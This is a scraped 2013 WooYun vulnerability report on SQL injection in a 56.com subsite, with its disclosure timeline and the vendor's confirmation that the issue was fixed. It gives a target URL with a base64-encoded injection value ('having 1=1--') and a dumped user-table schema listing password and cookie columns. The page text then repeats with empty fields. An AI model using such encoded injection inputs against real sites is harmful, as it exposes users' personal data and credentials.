56网某分站sql注入可导致大量用户信息泄露

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-027362

漏洞标题：56网某分站sql注入可导致大量用户信息泄露

漏洞作者： ryo.boom

提交时间：2013-07-01 17:50

修复时间：2013-08-15 17:51

公开时间：2013-08-15 17:51

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：1

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2013-07-01：细节已通知厂商并且等待厂商处理中
2013-07-01：厂商已经确认，细节仅向厂商公开
2013-07-11：细节向核心白帽子及相关领域专家公开
2013-07-21：细节向普通白帽子公开
2013-07-31：细节向实习白帽子公开
2013-08-15：细节向公众公开

简要描述：

56分站sql注入

详细说明：

http://hdmv.app.56.com/web/getuserdata_56.asp?mvid=MTQ3NzE0IGhhdmluZyAxPTEtLQ==

我只是来求个邀请码的!!

漏洞证明：

Table: usr
[47 columns]
+------------------------+-----------+
| Column                 | Type      |
+------------------------+-----------+
| address1               | varchar   |
| address2               | varchar   |
| addtime                | timestamp |
| bactive                | int4      |
| balertcomment          | int4      |
| bcontract              | int4      |
| bedit                  | int4      |
| beditbba               | int4      |
| birthday               | timestamp |
| bpointopen             | int4      |
| bvalidate              | int4      |
| city                   | varchar   |
| communityid            | int4      |
| company                | varchar   |
| countryid              | varchar   |
| email                  | varchar   |
| facebookid             | varchar   |
| firstname              | varchar   |
| gui                    | varchar   |
| introduction           | text      |
| langid                 | int4      |
| lastname               | varchar   |
| mobile                 | varchar   |
| nickname               | varchar   |
| phone                  | varchar   |
| pointcpsharepercentage | int4      |
| pointduetime           | timestamp |
| roleid                 | int4      |
| sex                    | int4      |
| state                  | varchar   |
| totalfilelen           | int4      |
| totalfilenum           | int4      |
| totalfreepointnum      | int4      |
| totalmsgnum            | int4      |
| totalpointnum          | int4      |
| url                    | varchar   |
| usefreepointnum        | int4      |
| usepointnum            | int4      |
| user56id               | varchar   |
| usrcookies             | varchar   |
| usrid                  | int4      |
| usrid_sync             | int4      |
| usrimgurl              | varchar   |
| usrpassword            | varchar   |
| validatekey            | varchar   |
| yahoobbauserhash       | varchar   |
| zip                    | varchar   |
+------------------------+-----------+

修复方案：

版权声明：转载请注明来源 ryo.boom@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：6

确认时间：2013-07-01 19:02

厂商回复：

多谢反馈，问题已解决

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-027362

漏洞标题：56网某分站sql注入可导致大量用户信息泄露

相关厂商：56.com

漏洞作者： ryo.boom

提交时间：2013-07-01 17:50

修复时间：2013-08-15 17:51

公开时间：2013-08-15 17:51

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：1

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 ryo.boom@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-027362

漏洞标题：56网某分站sql注入可导致大量用户信息泄露

相关厂商：56.com

漏洞作者： ryo.boom

提交时间：2013-07-01 17:50

修复时间：2013-08-15 17:51

公开时间：2013-08-15 17:51

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：1

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2013-027362"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 ryo.boom@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：